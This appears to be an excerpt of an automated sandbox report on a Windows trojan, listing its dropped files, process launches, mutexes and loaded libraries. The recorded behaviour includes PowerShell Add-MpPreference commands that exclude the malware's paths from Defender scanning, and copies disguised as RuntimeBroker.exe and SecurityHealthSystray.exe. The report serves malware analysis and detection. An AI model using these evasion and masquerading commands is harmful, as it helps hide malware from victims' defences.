                            Source: powershell.exe, 00000004.00000002.1808534246.000001DD00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1815208929.0000016700001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1834937845.0000024D2A3F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1815252219.0000023D00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1817388172.000001F24AF01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1823237770.000001B882351000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                            Source: powershell.exe, 0000000D.00000002.3222131396.000001B8923C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                            Source: powershell.exe, 0000000D.00000002.3222131396.000001B8923C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                            Source: powershell.exe, 0000000D.00000002.3222131396.000001B8923C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                            Source: svchost.exe, 00000018.00000003.1841092822.000001CE0CEC2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.24.drString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
                            Source: svchost.exe, 00000018.00000003.1841092822.000001CE0CF1A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.1841092822.000001CE0CE0E000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.24.drString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
                            Source: svchost.exe, 00000018.00000003.1841092822.000001CE0CEC2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.24.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
                            Source: svchost.exe, 00000018.00000003.1841092822.000001CE0CEA3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.1841092822.000001CE0CEC2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.24.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
                            Source: svchost.exe, 00000018.00000003.1841092822.000001CE0CEC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
                            Source: powershell.exe, 0000000D.00000002.1823237770.000001B882577000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                            Source: powershell.exe, 00000004.00000002.2672003595.000001DD10075000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3162496814.0000016710076000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3227843973.0000024D3A465000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.3015277632.0000023D10076000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.3035136841.000001F25AF76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3222131396.000001B8923C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                            Source: svchost.exe, 00000018.00000003.1841092822.000001CE0CEC2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.24.drString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
                            Source: svchost.exe, 00000018.00000003.1841092822.000001CE0CE72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeWindow created: window name: CLIPBRDWNDCLASS
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeFile created: C:\Windows\SysWOW64\en-GB\Licenses\_Default\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeFile created: C:\Windows\SysWOW64\en-GB\Licenses\_Default\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe\:Zone.Identifier:$DATAJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeFile created: C:\Windows\SysWOW64\en-GB\Licenses\_Default\a4716c5db9108bJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\CSCF98670F718C4420FABE8D0275D85BFD.TMPJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                            Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile deleted: C:\Windows\System32\CSCF98670F718C4420FABE8D0275D85BFD.TMPJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeCode function: 0_2_00007FFD9BC31FA80_2_00007FFD9BC31FA8
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeCode function: 0_2_00007FFD9BC347480_2_00007FFD9BC34748
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeCode function: 22_2_00007FFD9B8A09AE22_2_00007FFD9B8A09AE
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeCode function: 22_2_00007FFD9B8A075622_2_00007FFD9B8A0756
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeCode function: 22_2_00007FFD9B8C100022_2_00007FFD9B8C1000
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeCode function: 22_2_00007FFD9B8CCE3A22_2_00007FFD9B8CCE3A
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeCode function: 25_2_00007FFD9B8C100025_2_00007FFD9B8C1000
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeCode function: 25_2_00007FFD9B8CCE3A25_2_00007FFD9B8CCE3A
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeCode function: 25_2_00007FFD9B8A09AC25_2_00007FFD9B8A09AC
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeCode function: 28_2_00007FFD9B88084828_2_00007FFD9B880848
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeCode function: 28_2_00007FFD9B880D7828_2_00007FFD9B880D78
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeCode function: 29_2_00007FFD9B880D7829_2_00007FFD9B880D78
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeCode function: 29_2_00007FFD9B8B100029_2_00007FFD9B8B1000
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeCode function: 29_2_00007FFD9B89102929_2_00007FFD9B891029
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeCode function: 29_2_00007FFD9B8909AE29_2_00007FFD9B8909AE
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeCode function: 29_2_00007FFD9B89075629_2_00007FFD9B890756
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeCode function: 30_2_00007FFD9B8A0D7830_2_00007FFD9B8A0D78
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeCode function: 31_2_00007FFD9B8C100031_2_00007FFD9B8C1000
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeCode function: 31_2_00007FFD9B8CCE3A31_2_00007FFD9B8CCE3A
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeCode function: 31_2_00007FFD9B8A09AC31_2_00007FFD9B8A09AC
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeCode function: 32_2_00007FFD9B880D7832_2_00007FFD9B880D78
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeCode function: 32_2_00007FFD9B89102932_2_00007FFD9B891029
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeCode function: 32_2_00007FFD9B8909AE32_2_00007FFD9B8909AE
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeCode function: 32_2_00007FFD9B89075632_2_00007FFD9B890756
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeCode function: 32_2_00007FFD9B8B100032_2_00007FFD9B8B1000
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeCode function: 33_2_00007FFD9B8C100033_2_00007FFD9B8C1000
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeCode function: 33_2_00007FFD9B8CCE3A33_2_00007FFD9B8CCE3A
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeCode function: 33_2_00007FFD9B8A09AC33_2_00007FFD9B8A09AC
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeCode function: 34_2_00007FFD9B870D7834_2_00007FFD9B870D78
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeCode function: 36_2_00007FFD9B8D100036_2_00007FFD9B8D1000
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeCode function: 36_2_00007FFD9B8B102936_2_00007FFD9B8B1029
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeCode function: 36_2_00007FFD9B8B09AE36_2_00007FFD9B8B09AE
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeCode function: 36_2_00007FFD9B8B075636_2_00007FFD9B8B0756
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeCode function: 36_2_00007FFD9B8A0D7836_2_00007FFD9B8A0D78
                            Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exe 8B0B6F7BA3C1C98FDC17CEB74E37057793E104DC92AA4D4319D71411B3E56366
                            Source: Joe Sandbox ViewDropped File: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe 8B0B6F7BA3C1C98FDC17CEB74E37057793E104DC92AA4D4319D71411B3E56366
                            Source: Joe Sandbox ViewDropped File: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe 8B0B6F7BA3C1C98FDC17CEB74E37057793E104DC92AA4D4319D71411B3E56366
                            Source: EQdhBjQw4G.exe, 00000000.00000000.1639490533.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs EQdhBjQw4G.exe
                            Source: EQdhBjQw4G.exe, 00000000.00000002.1742149655.000000001C680000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs EQdhBjQw4G.exe
                            Source: EQdhBjQw4G.exe, 00000000.00000002.1742149655.000000001C680000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs EQdhBjQw4G.exe
                            Source: EQdhBjQw4G.exe, 0000001C.00000002.2086973280.00000000026FD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs EQdhBjQw4G.exe
                            Source: EQdhBjQw4G.exe, 0000001C.00000002.2086973280.00000000026B0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs EQdhBjQw4G.exe
                            Source: EQdhBjQw4G.exe, 0000001F.00000002.2391405992.0000000002B32000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs EQdhBjQw4G.exe
                            Source: EQdhBjQw4G.exe, 0000001F.00000002.2391405992.0000000002BE4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs EQdhBjQw4G.exe
                            Source: EQdhBjQw4G.exe, 0000001F.00000002.2391405992.0000000002B20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs EQdhBjQw4G.exe
                            Source: EQdhBjQw4G.exe, 0000001F.00000002.2391405992.0000000002B6D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs EQdhBjQw4G.exe
                            Source: EQdhBjQw4G.exe, 00000022.00000002.2666291538.0000000002EFD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs EQdhBjQw4G.exe
                            Source: EQdhBjQw4G.exe, 00000022.00000002.2666291538.0000000002EB0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs EQdhBjQw4G.exe
                            Source: EQdhBjQw4G.exe, 00000022.00000002.2666291538.0000000002F74000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs EQdhBjQw4G.exe
                            Source: EQdhBjQw4G.exe, 00000022.00000002.2666291538.0000000002EC2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs EQdhBjQw4G.exe
                            Source: EQdhBjQw4G.exeBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs EQdhBjQw4G.exe
                            Source: EQdhBjQw4G.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                            Source: EQdhBjQw4G.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: RuntimeBroker.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe0.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe1.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: EQdhBjQw4G.exe, hpJE61kMAL8Awig2KFg.csCryptographic APIs: 'CreateDecryptor'
                            Source: EQdhBjQw4G.exe, hpJE61kMAL8Awig2KFg.csCryptographic APIs: 'CreateDecryptor'
                            Source: EQdhBjQw4G.exe, hpJE61kMAL8Awig2KFg.csCryptographic APIs: 'CreateDecryptor'
                            Source: EQdhBjQw4G.exe, hpJE61kMAL8Awig2KFg.csCryptographic APIs: 'CreateDecryptor'
                            Source: classification engineClassification label: mal100.spre.troj.expl.evad.winEXE@49/56@1/2
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\RuntimeBroker.exeJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeFile created: C:\Users\user\Desktop\vTqzCdqK.logJump to behavior
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeMutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-fMqIIZ3msKTluYQzOgJz
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeMutant created: NULL
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5012:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7544:120:WilError_03
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeFile created: C:\Users\user\AppData\Local\Temp\5czz1opiJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\nQeR8AonhE.bat"
                            Source: EQdhBjQw4G.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: EQdhBjQw4G.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeFile read: C:\Users\desktop.iniJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                            Source: EQdhBjQw4G.exeReversingLabs: Detection: 65%
                            Source: EQdhBjQw4G.exeVirustotal: Detection: 52%
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeFile read: C:\Users\user\Desktop\EQdhBjQw4G.exeJump to behavior
                            Source: unknownProcess created: C:\Users\user\Desktop\EQdhBjQw4G.exe "C:\Users\user\Desktop\EQdhBjQw4G.exe"
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5czz1opi\5czz1opi.cmdline"
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES790E.tmp" "c:\Windows\System32\CSCF98670F718C4420FABE8D0275D85BFD.TMP"
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe'
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\SysWOW64\en-GB\Licenses\_Default\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\RuntimeBroker.exe'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\Start Menu\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\EQdhBjQw4G.exe'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\nQeR8AonhE.bat"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                            Source: unknownProcess created: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe "C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exe "C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\RuntimeBroker.exe"
                            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                            Source: unknownProcess created: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exe "C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\RuntimeBroker.exe"
                            Source: unknownProcess created: C:\Users\user\Desktop\EQdhBjQw4G.exe "C:\Users\user\Desktop\EQdhBjQw4G.exe"
                            Source: unknownProcess created: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe "C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe"
                            Source: unknownProcess created: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exe "C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\RuntimeBroker.exe"
                            Source: unknownProcess created: C:\Users\user\Desktop\EQdhBjQw4G.exe "C:\Users\user\Desktop\EQdhBjQw4G.exe"
                            Source: unknownProcess created: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe "C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe"
                            Source: unknownProcess created: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exe "C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\RuntimeBroker.exe"
                            Source: unknownProcess created: C:\Users\user\Desktop\EQdhBjQw4G.exe "C:\Users\user\Desktop\EQdhBjQw4G.exe"
                            Source: unknownProcess created: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe "C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe"
                            Source: unknownProcess created: C:\Windows\SysWOW64\en-GB\Licenses\_Default\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe "C:\Windows\SysWOW64\en-GB\Licenses\_Default\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe"
                            Source: unknownProcess created: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exe "C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\RuntimeBroker.exe"
                            Source: unknownProcess created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe "C:\Users\Default User\Start Menu\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe"
                            Source: unknownProcess created: C:\Users\user\Desktop\EQdhBjQw4G.exe "C:\Users\user\Desktop\EQdhBjQw4G.exe"
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5czz1opi\5czz1opi.cmdline"Jump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES790E.tmp" "c:\Windows\System32\CSCF98670F718C4420FABE8D0275D85BFD.TMP"Jump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\RuntimeBroker.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\Start Menu\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\EQdhBjQw4G.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\nQeR8AonhE.bat" Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES790E.tmp" "c:\Windows\System32\CSCF98670F718C4420FABE8D0275D85BFD.TMP"Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exe "C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\RuntimeBroker.exe"
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeSection loaded: cryptbase.dllJump to behavior
